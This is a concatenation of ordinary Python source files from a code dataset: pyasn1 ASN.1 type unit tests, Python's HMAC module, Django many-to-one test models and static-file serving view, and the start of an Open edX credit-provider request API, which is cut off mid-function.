s.setComponentByPosition(0, univ.OctetString('abc'))
s[0] = 'abc'
assert s['field-0']
assert s[0]
try:
s['field-1']
except KeyError:
pass
else:
assert False, 'KeyError not raised'
def testSetItem(self):
s = univ.Sequence()
s.setComponentByPosition(0, univ.OctetString('abc'))
s['field-0'] = 'xxx'
try:
s['field-1'] = 'xxx'
except KeyError:
pass
else:
assert False, 'KeyError not raised'
def testIter(self):
s = univ.Sequence()
s.setComponentByPosition(0, univ.OctetString('abc'))
s.setComponentByPosition(1, univ.Integer(123))
assert list(s) == ['field-0', 'field-1']
def testKeys(self):
s = univ.Sequence()
s.setComponentByPosition(0, univ.OctetString('abc'))
s.setComponentByPosition(1, univ.Integer(123))
assert list(s.keys()) == ['field-0', 'field-1']
def testValues(self):
s = univ.Sequence()
s.setComponentByPosition(0, univ.OctetString('abc'))
s.setComponentByPosition(1, univ.Integer(123))
assert list(s.values()) == [str2octs('abc'), 123]
def testItems(self):
s = univ.Sequence()
s.setComponentByPosition(0, univ.OctetString('abc'))
s.setComponentByPosition(1, univ.Integer(123))
assert list(s.items()) == [('field-0', str2octs('abc')), ('field-1', 123)]
def testUpdate(self):
s = univ.Sequence()
assert not s
s.setComponentByPosition(0, univ.OctetString('abc'))
s.setComponentByPosition(1, univ.Integer(123))
assert s
assert list(s.keys()) == ['field-0', 'field-1']
assert list(s.values()) == [str2octs('abc'), 123]
assert list(s.items()) == [('field-0', str2octs('abc')), ('field-1', 123)]
s['field-0'] = univ.OctetString('def')
assert list(s.values()) == [str2octs('def'), 123]
s['field-1'] = univ.OctetString('ghi')
assert list(s.values()) == [str2octs('def'), str2octs('ghi')]
try:
s['field-2'] = univ.OctetString('xxx')
except KeyError:
pass
else:
            assert False, 'unknown field in schema-less object tolerated'
assert 'field-0' in s
s.clear()
assert 'field-0' not in s
class SequencePicklingTestCase(unittest.TestCase):
def testSchemaPickling(self):
old_asn1 = univ.Sequence(
componentType=namedtype.NamedTypes(
namedtype.NamedType('name', univ.OctetString())
)
)
serialised = pickle.dumps(old_asn1)
assert serialised
new_asn1 = pickle.loads(serialised)
assert type(new_asn1) == univ.Sequence
assert old_asn1.isSameTypeWith(new_asn1)
def testValuePickling(self):
old_asn1 = univ.Sequence(
componentType=namedtype.NamedTypes(
namedtype.NamedType('name', univ.OctetString())
)
)
old_asn1['name'] = 'test'
serialised = pickle.dumps(old_asn1)
assert serialised
new_asn1 = pickle.loads(serialised)
assert new_asn1
assert new_asn1['name'] == str2octs('test')
class SetOf(BaseTestCase):
def setUp(self):
BaseTestCase.setUp(self)
self.s1 = univ.SetOf(componentType=univ.OctetString(''))
def testTag(self):
assert self.s1.tagSet == tag.TagSet(
(),
tag.Tag(tag.tagClassUniversal, tag.tagFormatConstructed, 0x11)
), 'wrong tagSet'
def testSeq(self):
self.s1.setComponentByPosition(0, univ.OctetString('abc'))
assert self.s1[0] == str2octs('abc'), 'set by idx fails'
self.s1.setComponentByPosition(0, self.s1[0].clone('cba'))
assert self.s1[0] == str2octs('cba'), 'set by idx fails'
def testStaticDef(self):
        class SetOf(univ.SetOf):
componentType = univ.OctetString('')
s = SetOf()
s[0] = 'abc'
assert len(s) == 1
assert s == [str2octs('abc')]
class SetOfPicklingTestCase(unittest.TestCase):
def testSchemaPickling(self):
old_asn1 = univ.SetOf(componentType=univ.OctetString())
serialised = pickle.dumps(old_asn1)
assert serialised
new_asn1 = pickle.loads(serialised)
assert type(new_asn1) == univ.SetOf
assert old_asn1.isSameTypeWith(new_asn1)
def testValuePickling(self):
old_asn1 = univ.SetOf(componentType=univ.OctetString())
old_asn1[0] = 'test'
serialised = pickle.dumps(old_asn1)
assert serialised
new_asn1 = pickle.loads(serialised)
assert new_asn1
assert new_asn1 == [str2octs('test')]
class Set(BaseTestCase):
def setUp(self):
BaseTestCase.setUp(self)
self.s1 = univ.Set(
componentType=namedtype.NamedTypes(
namedtype.NamedType('name', univ.OctetString('')),
namedtype.OptionalNamedType('null', univ.Null('')),
namedtype.DefaultedNamedType('age', univ.Integer(34))
)
)
self.s2 = self.s1.clone()
def testTag(self):
assert self.s1.tagSet == tag.TagSet(
(),
tag.Tag(tag.tagClassUniversal, tag.tagFormatConstructed, 0x11)
), 'wrong tagSet'
def testByTypeWithPythonValue(self):
self.s1.setComponentByType(univ.OctetString.tagSet, 'abc')
assert self.s1.getComponentByType(
univ.OctetString.tagSet
) == str2octs('abc'), 'set by name fails'
def testByTypeWithInstance(self):
self.s1.setComponentByType(univ.OctetString.tagSet, univ.OctetString('abc'))
assert self.s1.getComponentByType(
univ.OctetString.tagSet
) == str2octs('abc'), 'set by name fails'
def testGetTagMap(self):
assert self.s1.tagMap.presentTypes == {
univ.Set.tagSet: univ.Set()
}
def testGetComponentTagMap(self):
assert self.s1.componentType.tagMapUnique.presentTypes == {
univ.OctetString.tagSet: univ.OctetString(''),
univ.Null.tagSet: univ.Null(''),
univ.Integer.tagSet: univ.Integer(34)
}
def testGetPositionByType(self):
assert self.s1.componentType.getPositionByType(univ.Null().tagSet) == 1
def testSetToDefault(self):
self.s1.setComponentByName('name', univ.noValue)
assert self.s1['name'] == univ.OctetString('')
def testIter(self):
assert list(self.s1) == ['name', 'null', 'age']
def testStaticDef(self):
class Set(univ.Set):
componentType = namedtype.NamedTypes(
namedtype.NamedType('name', univ.OctetString('')),
namedtype.OptionalNamedType('nick', univ.OctetString('')),
namedtype.DefaultedNamedType('age', univ.Integer(34))
)
s = Set()
s['name'] = 'abc'
assert s['name'] == str2octs('abc')
def testGetComponentWithDefault(self):
class Set(univ.Set):
componentType = namedtype.NamedTypes(
namedtype.NamedType('id', univ.Integer(123)),
namedtype.OptionalNamedType('nick', univ.OctetString()),
)
s = Set()
assert s[0] == 123
assert s.getComponentByPosition(1, default=None, instantiate=False) is None
assert s.getComponentByName('nick', default=None) is None
s[1] = 'test'
assert s.getComponentByPosition(1, default=None) is not None
assert s.getComponentByPosition(1, default=None) == str2octs('test')
s.clear()
assert s.getComponentByPosition(1, default=None) is None
def testGetComponentNoInstantiation(self):
class Set(univ.Set):
componentType = namedtype.NamedTypes(
namedtype.NamedType('id', univ.Integer(123)),
namedtype.OptionalNamedType('nick', univ.OctetString()),
)
s = Set()
assert s[0] == 123
assert s.getComponentByPosition(1, instantiate=False) is univ.noValue
assert s.getComponentByName('nick', instantiate=False) is univ.noValue
assert s.getComponentByType(univ.OctetString.tagSet, instantiate=False) is univ.noValue
s[1] = 'test'
assert s.getComponentByPosition(1, instantiate=False) is not univ.noValue
assert s.getComponentByPosition(1, instantiate=False) == str2octs('test')
s.clear()
assert s.getComponentByPosition(1, instantiate=False) is univ.noValue
class SetPicklingTestCase(unittest.TestCase):
def testSchemaPickling(self):
old_asn1 = univ.Set(
componentType=namedtype.NamedTypes(
namedtype.NamedType('name', univ.OctetString())
)
)
serialised = pickle.dumps(old_asn1)
assert serialised
new_asn1 = pickle.loads(serialised)
assert type(new_asn1) == univ.Set
assert old_asn1.isSameTypeWith(new_asn1)
def testValuePickling(self):
old_asn1 = univ.Set(
componentType=namedtype.NamedTypes(
namedtype.NamedType('name', univ.OctetString())
)
)
old_asn1['name'] = 'test'
serialised = pickle.dumps(old_asn1)
assert serialised
new_asn1 = pickle.loads(serialised)
assert new_asn1
assert new_asn1['name'] == str2octs('test')
class Choice(BaseTestCase):
def setUp(self):
BaseTestCase.setUp(self)
innerComp = univ.Choice(
componentType=namedtype.NamedTypes(
namedtype.NamedType('count', univ.Integer()),
namedtype.NamedType('flag', univ.Boolean())
)
)
self.s1 = univ.Choice(
componentType=namedtype.NamedTypes(
namedtype.NamedType('name', univ.OctetString()),
namedtype.NamedType('sex', innerComp)
)
)
def testTag(self):
assert self.s1.tagSet == tag.TagSet(), 'wrong tagSet'
def testRepr(self):
assert 'Choice' in repr(self.s1.clone().setComponents('a'))
s = self.s1.clone().setComponents(
sex=self.s1.setComponentByPosition(1).getComponentByPosition(1).clone().setComponents(count=univ.Integer(123))
)
assert 'Choice' in repr(s)
def testContains(self):
self.s1.setComponentByType(univ.OctetString.tagSet, 'abc')
assert 'name' in self.s1
assert 'sex' not in self.s1
self.s1.setComponentByType(univ.Integer.tagSet, 123, innerFlag=True)
assert 'name' not in self.s1
assert 'sex' in self.s1
def testIter(self):
self.s1.setComponentByType(univ.OctetString.tagSet, 'abc')
assert list(self.s1) == ['name']
self.s1.setComponentByType(univ.Integer.tagSet, 123, innerFlag=True)
assert list(self.s1) == ['sex']
def testOuterByTypeWithPythonValue(self):
self.s1.setComponentByType(univ.OctetString.tagSet, 'abc')
assert self.s1.getComponentByType(
univ.OctetString.tagSet
) == str2octs('abc')
def testOuterByTypeWithInstanceValue(self):
self.s1.setComponentByType(
univ.OctetString.tagSet, univ.OctetString('abc')
)
assert self.s1.getComponentByType(
univ.OctetString.tagSet
) == str2octs('abc')
def testInnerByTypeWithPythonValue(self):
self.s1.setComponentByType(univ.Integer.tagSet, 123, innerFlag=True)
assert self.s1.getComponentByType(
univ.Integer.tagSet, 1
) == 123
def testInnerByTypeWithInstanceValue(self):
self.s1.setComponentByType(
univ.Integer.tagSet, univ.Integer(123), innerFlag=True
)
assert self.s1.getComponentByType(
univ.Integer.tagSet, 1
) == 123
def testCmp(self):
self.s1.setComponentByName('name', univ.OctetString('abc'))
assert self.s1 == str2octs('abc'), '__cmp__() fails'
def testGetComponent(self):
self.s1.setComponentByType(univ.OctetString.tagSet, 'abc')
assert self.s1.getComponent() == str2octs('abc'), 'getComponent() fails'
def testGetName(self):
self.s1.setComponentByType(univ.OctetString.tagSet, 'abc')
assert self.s1.getName() == 'name', 'getName() fails'
def testSetComponentByPosition(self):
self.s1.setComponentByPosition(0, univ.OctetString('Jim'))
assert self.s1 == str2octs('Jim')
def testClone(self):
self.s1.setComponentByPosition(0, univ.OctetString('abc'))
s = self.s1.clone()
assert len(s) == 0
s = self.s1.clone(cloneValueFlag=1)
assert len(s) == 1
assert s.getComponentByPosition(0) == self.s1.getComponentByPosition(0)
def testSetToDefault(self):
s = self.s1.clone()
s.setComponentByName('sex', univ.noValue)
assert s['sex'] is not univ.noValue
def testStaticDef(self):
class InnerChoice(univ.Choice):
componentType = namedtype.NamedTypes(
namedtype.NamedType('count', univ.Integer()),
namedtype.NamedType('flag', univ.Boolean())
)
class OuterChoice(univ.Choice):
componentType = namedtype.NamedTypes(
namedtype.NamedType('name', univ.OctetString()),
namedtype.NamedType('sex', InnerChoice())
)
c = OuterChoice()
c.setComponentByType(univ.OctetString.tagSet, 'abc')
assert c.getName() == 'name'
def testGetComponentWithDefault(self):
s = univ.Choice(
componentType=namedtype.NamedTypes(
namedtype.NamedType('name', univ.OctetString()),
namedtype.NamedType('id', univ.Integer())
)
)
assert s.getComponentByPosition(0, default=None, instantiate=False) is None
assert s.getComponentByPosition(1, default=None, instantiate=False) is None
assert s.getComponentByName('name', default=None, instantiate=False) is None
assert s.getComponentByName('id', default=None, instantiate=False) is None
assert s.getComponentByType(univ.OctetString.tagSet, default=None) is None
assert s.getComponentByType(univ.Integer.tagSet, default=None) is None
s[1] = 123
assert s.getComponentByPosition(1, default=None) is not None
assert s.getComponentByPosition(1, univ.noValue) == 123
s.clear()
assert s.getComponentByPosition(1, default=None, instantiate=False) is None
def testGetComponentNoInstantiation(self):
s = univ.Choice(
componentType=namedtype.NamedTypes(
namedtype.NamedType('name', univ.OctetString()),
namedtype.NamedType('id', univ.Integer())
)
)
assert s.getComponentByPosition(0, instantiate=False) is univ.noValue
assert s.getComponentByPosition(1, instantiate=False) is univ.noValue
assert s.getComponentByName('name', instantiate=False) is univ.noValue
assert s.getComponentByName('id', instantiate=False) is univ.noValue
assert s.getComponentByType(univ.OctetString.tagSet, instantiate=False) is univ.noValue
assert s.getComponentByType(univ.Integer.tagSet, instantiate=False) is univ.noValue
s[1] = 123
assert s.getComponentByPosition(1, instantiate=False) is not univ.noValue
assert s.getComponentByPosition(1, instantiate=False) == 123
s.clear()
assert s.getComponentByPosition(1, instantiate=False) is univ.noValue
class ChoicePicklingTestCase(unittest.TestCase):
def testSchemaPickling(self):
old_asn1 = univ.Choice(
componentType=namedtype.NamedTypes(
namedtype.NamedType('name', univ.OctetString()),
namedtype.NamedType('id', univ.Integer())
)
)
serialised = pickle.dumps(old_asn1)
assert serialised
new_asn1 = pickle.loads(serialised)
assert type(new_asn1) == univ.Choice
assert old_asn1.isSameTypeWith(new_asn1)
def testValuePickling(self):
old_asn1 = univ.Choice(
componentType=namedtype.NamedTypes(
namedtype.NamedType('name', univ.OctetString()),
namedtype.NamedType('id', univ.Integer())
)
)
old_asn1['name'] = 'test'
serialised = pickle.dumps(old_asn1)
assert serialised
new_asn1 = pickle.loads(serialised)
assert new_asn1
assert new_asn1['name'] == str2octs('test')
suite = unittest.TestLoader().loadTestsFromModule(sys.modules[__name__])
if __name__ == '__main__':
unittest.TextTestRunner(verbosity=2).run(suite)
| bsd-2-clause |
momm3/WelcomeBot | welcomebot/Lib/hmac.py | 27 | 5057 | """HMAC (Keyed-Hashing for Message Authentication) Python module.
Implements the HMAC algorithm as described by RFC 2104.
"""
import warnings as _warnings
from _operator import _compare_digest as compare_digest
import hashlib as _hashlib
trans_5C = bytes((x ^ 0x5C) for x in range(256))
trans_36 = bytes((x ^ 0x36) for x in range(256))
# The size of the digests returned by HMAC depends on the underlying
# hashing module used. Use digest_size from the instance of HMAC instead.
digest_size = None
class HMAC:
"""RFC 2104 HMAC class. Also complies with RFC 4231.
This supports the API for Cryptographic Hash Functions (PEP 247).
"""
blocksize = 64 # 512-bit HMAC; can be changed in subclasses.
def __init__(self, key, msg = None, digestmod = None):
"""Create a new HMAC object.
key: key for the keyed hash object.
msg: Initial input for the hash, if provided.
digestmod: A module supporting PEP 247. *OR*
A hashlib constructor returning a new hash object. *OR*
A hash name suitable for hashlib.new().
Defaults to hashlib.md5.
Implicit default to hashlib.md5 is deprecated and will be
removed in Python 3.6.
        Note: key and msg must be bytes or bytearray objects.
"""
if not isinstance(key, (bytes, bytearray)):
raise TypeError("key: expected bytes or bytearray, but got %r" % type(key).__name__)
if digestmod is None:
_warnings.warn("HMAC() without an explicit digestmod argument "
"is deprecated.", PendingDeprecationWarning, 2)
digestmod = _hashlib.md5
if callable(digestmod):
self.digest_cons = digestmod
elif isinstance(digestmod, str):
self.digest_cons = lambda d=b'': _hashlib.new(digestmod, d)
else:
self.digest_cons = lambda d=b'': digestmod.new(d)
self.outer = self.digest_cons()
self.inner = self.digest_cons()
self.digest_size = self.inner.digest_size
if hasattr(self.inner, 'block_size'):
blocksize = self.inner.block_size
if blocksize < 16:
_warnings.warn('block_size of %d seems too small; using our '
'default of %d.' % (blocksize, self.blocksize),
RuntimeWarning, 2)
blocksize = self.blocksize
else:
_warnings.warn('No block_size attribute on given digest object; '
'Assuming %d.' % (self.blocksize),
RuntimeWarning, 2)
blocksize = self.blocksize
# self.blocksize is the default blocksize. self.block_size is
# effective block size as well as the public API attribute.
self.block_size = blocksize
if len(key) > blocksize:
key = self.digest_cons(key).digest()
key = key.ljust(blocksize, b'\0')
self.outer.update(key.translate(trans_5C))
self.inner.update(key.translate(trans_36))
if msg is not None:
self.update(msg)
@property
def name(self):
return "hmac-" + self.inner.name
def update(self, msg):
"""Update this hashing object with the string msg.
"""
self.inner.update(msg)
def copy(self):
"""Return a separate copy of this hashing object.
An update to this copy won't affect the original object.
"""
# Call __new__ directly to avoid the expensive __init__.
other = self.__class__.__new__(self.__class__)
other.digest_cons = self.digest_cons
other.digest_size = self.digest_size
other.inner = self.inner.copy()
other.outer = self.outer.copy()
return other
def _current(self):
"""Return a hash object for the current state.
To be used only internally with digest() and hexdigest().
"""
h = self.outer.copy()
h.update(self.inner.digest())
return h
def digest(self):
"""Return the hash value of this hashing object.
This returns a string containing 8-bit data. The object is
not altered in any way by this function; you can continue
updating the object after calling this function.
"""
h = self._current()
return h.digest()
def hexdigest(self):
"""Like digest(), but returns a string of hexadecimal digits instead.
"""
h = self._current()
return h.hexdigest()
def new(key, msg = None, digestmod = None):
"""Create a new hashing object and return it.
key: The starting key for the hash.
msg: if available, will immediately be hashed into the object's starting
state.
You can now feed arbitrary strings into the object using its update()
method, and can ask for the hash value at any time by calling its digest()
method.
"""
return HMAC(key, msg, digestmod)
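# --- Illustrative usage sketch (editor addition; not part of the original module) ---
# Shows keyed hashing and constant-time verification with the API above. The key,
# message and the sha256 digestmod below are example values, not taken from the source.
if __name__ == '__main__':
    _mac = new(b'secret-key', b'message to authenticate',
               digestmod=_hashlib.sha256).hexdigest()
    _again = new(b'secret-key', b'message to authenticate',
                 digestmod=_hashlib.sha256).hexdigest()
    # compare_digest() avoids timing side channels when checking a received MAC.
    assert compare_digest(_mac, _again)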
| mit |
mcardillo55/django | tests/many_to_one/models.py | 128 | 2623 | """
Many-to-one relationships
To define a many-to-one relationship, use ``ForeignKey()``.
"""
from __future__ import unicode_literals
from django.db import models
from django.utils.encoding import python_2_unicode_compatible
@python_2_unicode_compatible
class Reporter(models.Model):
first_name = models.CharField(max_length=30)
last_name = models.CharField(max_length=30)
email = models.EmailField()
def __str__(self):
return "%s %s" % (self.first_name, self.last_name)
@python_2_unicode_compatible
class Article(models.Model):
headline = models.CharField(max_length=100)
pub_date = models.DateField()
reporter = models.ForeignKey(Reporter)
def __str__(self):
return self.headline
class Meta:
ordering = ('headline',)
# If ticket #1578 ever slips back in, these models will not be able to be
# created (the field names being lower-cased versions of their opposite
# classes is important here).
class First(models.Model):
second = models.IntegerField()
class Second(models.Model):
first = models.ForeignKey(First, related_name='the_first')
# Protect against repetition of #1839, #2415 and #2536.
class Third(models.Model):
name = models.CharField(max_length=20)
third = models.ForeignKey('self', null=True, related_name='child_set')
class Parent(models.Model):
name = models.CharField(max_length=20, unique=True)
bestchild = models.ForeignKey('Child', null=True, related_name='favored_by')
class Child(models.Model):
name = models.CharField(max_length=20)
parent = models.ForeignKey(Parent)
class ToFieldChild(models.Model):
parent = models.ForeignKey(Parent, to_field='name')
# Multiple paths to the same model (#7110, #7125)
@python_2_unicode_compatible
class Category(models.Model):
name = models.CharField(max_length=20)
def __str__(self):
return self.name
class Record(models.Model):
category = models.ForeignKey(Category)
@python_2_unicode_compatible
class Relation(models.Model):
left = models.ForeignKey(Record, related_name='left_set')
right = models.ForeignKey(Record, related_name='right_set')
def __str__(self):
return "%s - %s" % (self.left.category.name, self.right.category.name)
# Test related objects visibility.
class SchoolManager(models.Manager):
def get_queryset(self):
return super(SchoolManager, self).get_queryset().filter(is_public=True)
class School(models.Model):
is_public = models.BooleanField(default=False)
objects = SchoolManager()
class Student(models.Model):
school = models.ForeignKey(School)
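# --- Illustrative usage sketch (editor addition; not part of the original test models) ---
# Rough example of the forward/reverse traversal these ForeignKeys provide, assuming
# a configured database; the object values below are made up for illustration.
#
#   r = Reporter.objects.create(first_name='John', last_name='Smith',
#                               email='john@example.com')
#   a = Article.objects.create(headline='Hello', pub_date=datetime.date(2015, 1, 1),
#                              reporter=r)
#   r.article_set.count()     # reverse accessor created by Article.reporter
#   a.reporter.first_name     # forward traversal back to the Reporter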
| bsd-3-clause |
WSDC-NITWarangal/django | django/views/static.py | 300 | 5129 | """
Views and functions for serving static files. These are only to be used
during development, and SHOULD NOT be used in a production setting.
"""
from __future__ import unicode_literals
import mimetypes
import os
import posixpath
import re
import stat
from django.http import (
FileResponse, Http404, HttpResponse, HttpResponseNotModified,
HttpResponseRedirect,
)
from django.template import Context, Engine, TemplateDoesNotExist, loader
from django.utils.http import http_date, parse_http_date
from django.utils.six.moves.urllib.parse import unquote
from django.utils.translation import ugettext as _, ugettext_lazy
def serve(request, path, document_root=None, show_indexes=False):
"""
Serve static files below a given point in the directory structure.
To use, put a URL pattern such as::
from django.views.static import serve
url(r'^(?P<path>.*)$', serve, {'document_root': '/path/to/my/files/'})
in your URLconf. You must provide the ``document_root`` param. You may
also set ``show_indexes`` to ``True`` if you'd like to serve a basic index
of the directory. This index view will use the template hardcoded below,
but if you'd like to override it, you can create a template called
``static/directory_index.html``.
"""
path = posixpath.normpath(unquote(path))
path = path.lstrip('/')
newpath = ''
for part in path.split('/'):
if not part:
# Strip empty path components.
continue
drive, part = os.path.splitdrive(part)
head, part = os.path.split(part)
if part in (os.curdir, os.pardir):
# Strip '.' and '..' in path.
continue
newpath = os.path.join(newpath, part).replace('\\', '/')
if newpath and path != newpath:
return HttpResponseRedirect(newpath)
fullpath = os.path.join(document_root, newpath)
if os.path.isdir(fullpath):
if show_indexes:
return directory_index(newpath, fullpath)
raise Http404(_("Directory indexes are not allowed here."))
if not os.path.exists(fullpath):
raise Http404(_('"%(path)s" does not exist') % {'path': fullpath})
# Respect the If-Modified-Since header.
statobj = os.stat(fullpath)
if not was_modified_since(request.META.get('HTTP_IF_MODIFIED_SINCE'),
statobj.st_mtime, statobj.st_size):
return HttpResponseNotModified()
content_type, encoding = mimetypes.guess_type(fullpath)
content_type = content_type or 'application/octet-stream'
response = FileResponse(open(fullpath, 'rb'), content_type=content_type)
response["Last-Modified"] = http_date(statobj.st_mtime)
if stat.S_ISREG(statobj.st_mode):
response["Content-Length"] = statobj.st_size
if encoding:
response["Content-Encoding"] = encoding
return response
DEFAULT_DIRECTORY_INDEX_TEMPLATE = """
{% load i18n %}
<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="Content-type" content="text/html; charset=utf-8" />
<meta http-equiv="Content-Language" content="en-us" />
<meta name="robots" content="NONE,NOARCHIVE" />
<title>{% blocktrans %}Index of {{ directory }}{% endblocktrans %}</title>
</head>
<body>
<h1>{% blocktrans %}Index of {{ directory }}{% endblocktrans %}</h1>
<ul>
{% if directory != "/" %}
<li><a href="../">../</a></li>
{% endif %}
{% for f in file_list %}
<li><a href="{{ f|urlencode }}">{{ f }}</a></li>
{% endfor %}
</ul>
</body>
</html>
"""
template_translatable = ugettext_lazy("Index of %(directory)s")
def directory_index(path, fullpath):
try:
t = loader.select_template([
'static/directory_index.html',
'static/directory_index',
])
except TemplateDoesNotExist:
t = Engine().from_string(DEFAULT_DIRECTORY_INDEX_TEMPLATE)
files = []
for f in os.listdir(fullpath):
if not f.startswith('.'):
if os.path.isdir(os.path.join(fullpath, f)):
f += '/'
files.append(f)
c = Context({
'directory': path + '/',
'file_list': files,
})
return HttpResponse(t.render(c))
def was_modified_since(header=None, mtime=0, size=0):
"""
Was something modified since the user last downloaded it?
header
This is the value of the If-Modified-Since header. If this is None,
I'll just return True.
mtime
This is the modification time of the item we're talking about.
size
This is the size of the item we're talking about.
"""
try:
if header is None:
raise ValueError
matches = re.match(r"^([^;]+)(; length=([0-9]+))?$", header,
re.IGNORECASE)
header_mtime = parse_http_date(matches.group(1))
header_len = matches.group(3)
if header_len and int(header_len) != size:
raise ValueError
if int(mtime) > header_mtime:
raise ValueError
except (AttributeError, ValueError, OverflowError):
return True
return False
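# --- Illustrative sketch (editor addition; not part of the original module) ---
# was_modified_since() compares an If-Modified-Since header against the file's
# mtime/size; the header string and timestamps below are example values only.
#
#   was_modified_since('Wed, 21 Oct 2015 07:28:00 GMT; length=1024',
#                      mtime=1445412480, size=1024)        # -> False (unchanged)
#   was_modified_since(None, mtime=1445412480, size=1024)   # -> True (no header)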
| bsd-3-clause |
nikolas/edx-platform | openedx/core/djangoapps/credit/api/provider.py | 12 | 15368 | """
API for initiating and tracking requests for credit from a provider.
"""
import datetime
import logging
import pytz
import uuid
from django.db import transaction
from lms.djangoapps.django_comment_client.utils import JsonResponse
from openedx.core.djangoapps.credit.exceptions import (
UserIsNotEligible,
CreditProviderNotConfigured,
RequestAlreadyCompleted,
CreditRequestNotFound,
InvalidCreditStatus,
)
from openedx.core.djangoapps.credit.models import (
CreditProvider,
CreditRequirementStatus,
CreditRequest,
CreditEligibility,
)
from openedx.core.djangoapps.credit.signature import signature, get_shared_secret_key
from student.models import User
from util.date_utils import to_timestamp
log = logging.getLogger(__name__)
def get_credit_providers(providers_list=None):
"""Retrieve all available credit providers or filter on given providers_list.
Arguments:
providers_list (list of strings or None): contains list of ids of credit providers
or None.
Returns:
list of credit providers represented as dictionaries
Response Values:
>>> get_credit_providers(['hogwarts'])
[
{
"id": "hogwarts",
"name": "Hogwarts School of Witchcraft and Wizardry",
"url": "https://credit.example.com/",
"status_url": "https://credit.example.com/status/",
"description: "A new model for the Witchcraft and Wizardry School System.",
"enable_integration": false,
"fulfillment_instructions": "
<p>In order to fulfill credit, Hogwarts School of Witchcraft and Wizardry requires learners to:</p>
<ul>
<li>Sample instruction abc</li>
<li>Sample instruction xyz</li>
</ul>",
},
...
]
"""
return CreditProvider.get_credit_providers(providers_list=providers_list)
def get_credit_provider_info(request, provider_id): # pylint: disable=unused-argument
"""Retrieve the 'CreditProvider' model data against provided
credit provider.
Args:
provider_id (str): The identifier for the credit provider
Returns: 'CreditProvider' data dictionary
Example Usage:
>>> get_credit_provider_info("hogwarts")
{
"provider_id": "hogwarts",
"display_name": "Hogwarts School of Witchcraft and Wizardry",
"provider_url": "https://credit.example.com/",
"provider_status_url": "https://credit.example.com/status/",
"provider_description: "A new model for the Witchcraft and Wizardry School System.",
"enable_integration": False,
"fulfillment_instructions": "
<p>In order to fulfill credit, Hogwarts School of Witchcraft and Wizardry requires learners to:</p>
<ul>
<li>Sample instruction abc</li>
<li>Sample instruction xyz</li>
</ul>",
"thumbnail_url": "https://credit.example.com/logo.png"
}
"""
credit_provider = CreditProvider.get_credit_provider(provider_id=provider_id)
credit_provider_data = {}
if credit_provider:
credit_provider_data = {
"provider_id": credit_provider.provider_id,
"display_name": credit_provider.display_name,
"provider_url": credit_provider.provider_url,
"provider_status_url": credit_provider.provider_status_url,
"provider_description": credit_provider.provider_description,
"enable_integration": credit_provider.enable_integration,
"fulfillment_instructions": credit_provider.fulfillment_instructions,
"thumbnail_url": credit_provider.thumbnail_url
}
return JsonResponse(credit_provider_data)
@transaction.commit_on_success
def create_credit_request(course_key, provider_id, username):
"""
Initiate a request for credit from a credit provider.
This will return the parameters that the user's browser will need to POST
to the credit provider. It does NOT calculate the signature.
Only users who are eligible for credit (have satisfied all credit requirements) are allowed to make requests.
A provider can be configured either with *integration enabled* or not.
If automatic integration is disabled, this method will simply return
a URL to the credit provider and method set to "GET", so the student can
visit the URL and request credit directly. No database record will be created
to track these requests.
If automatic integration *is* enabled, then this will also return the parameters
that the user's browser will need to POST to the credit provider.
These parameters will be digitally signed using a secret key shared with the credit provider.
A database record will be created to track the request with a 32-character UUID.
The returned dictionary can be used by the user's browser to send a POST request to the credit provider.
If a pending request already exists, this function should return a request description with the same UUID.
(Other parameters, such as the user's full name may be different than the original request).
If a completed request (either accepted or rejected) already exists, this function will
raise an exception. Users are not allowed to make additional requests once a request
has been completed.
Arguments:
course_key (CourseKey): The identifier for the course.
provider_id (str): The identifier of the credit provider.
username (str): The user initiating the request.
Returns: dict
Raises:
UserIsNotEligible: The user has not satisfied eligibility requirements for credit.
CreditProviderNotConfigured: The credit provider has not been configured for this course.
RequestAlreadyCompleted: The user has already submitted a request and received a response
from the credit provider.
Example Usage:
>>> create_credit_request(course.id, "hogwarts", "ron")
{
"url": "https://credit.example.com/request",
"method": "POST",
"parameters": {
"request_uuid": "557168d0f7664fe59097106c67c3f847",
"timestamp": 1434631630,
"course_org": "HogwartsX",
"course_num": "Potions101",
"course_run": "1T2015",
"final_grade": 0.95,
"user_username": "ron",
"user_email": "[email protected]",
"user_full_name": "Ron Weasley",
"user_mailing_address": "",
"user_country": "US",
"signature": "cRCNjkE4IzY+erIjRwOQCpRILgOvXx4q2qvx141BCqI="
}
}
"""
try:
user_eligibility = CreditEligibility.objects.select_related('course').get(
username=username,
course__course_key=course_key
)
credit_course = user_eligibility.course
credit_provider = CreditProvider.objects.get(provider_id=provider_id)
except CreditEligibility.DoesNotExist:
log.warning(
u'User "%s" tried to initiate a request for credit in course "%s", '
u'but the user is not eligible for credit',
username, course_key
)
raise UserIsNotEligible
except CreditProvider.DoesNotExist:
log.error(u'Credit provider with ID "%s" has not been configured.', provider_id)
raise CreditProviderNotConfigured
# Check if we've enabled automatic integration with the credit
# provider. If not, we'll show the user a link to a URL
# where the user can request credit directly from the provider.
# Note that we do NOT track these requests in our database,
# since the state would always be "pending" (we never hear back).
if not credit_provider.enable_integration:
return {
"url": credit_provider.provider_url,
"method": "GET",
"parameters": {}
}
else:
# If automatic credit integration is enabled, then try
# to retrieve the shared signature *before* creating the request.
# That way, if there's a misconfiguration, we won't have requests
# in our system that we know weren't sent to the provider.
shared_secret_key = get_shared_secret_key(credit_provider.provider_id)
if shared_secret_key is None:
msg = u'Credit provider with ID "{provider_id}" does not have a secret key configured.'.format(
provider_id=credit_provider.provider_id
)
log.error(msg)
raise CreditProviderNotConfigured(msg)
# Initiate a new request if one has not already been created
credit_request, created = CreditRequest.objects.get_or_create(
course=credit_course,
provider=credit_provider,
username=username,
)
# Check whether we've already gotten a response for a request,
# If so, we're not allowed to issue any further requests.
# Skip checking the status if we know that we just created this record.
if not created and credit_request.status != "pending":
log.warning(
(
u'Cannot initiate credit request because the request with UUID "%s" '
u'exists with status "%s"'
), credit_request.uuid, credit_request.status
)
raise RequestAlreadyCompleted
if created:
credit_request.uuid = uuid.uuid4().hex
# Retrieve user account and profile info
user = User.objects.select_related('profile').get(username=username)
# Retrieve the final grade from the eligibility table
try:
final_grade = CreditRequirementStatus.objects.get(
username=username,
requirement__namespace="grade",
requirement__name="grade",
status="satisfied"
).reason["final_grade"]
except (CreditRequirementStatus.DoesNotExist, TypeError, KeyError):
log.exception(
"Could not retrieve final grade from the credit eligibility table "
"for user %s in course %s.",
user.id, course_key
)
raise UserIsNotEligible
parameters = {
"request_uuid": credit_request.uuid,
"timestamp": to_timestamp(datetime.datetime.now(pytz.UTC)),
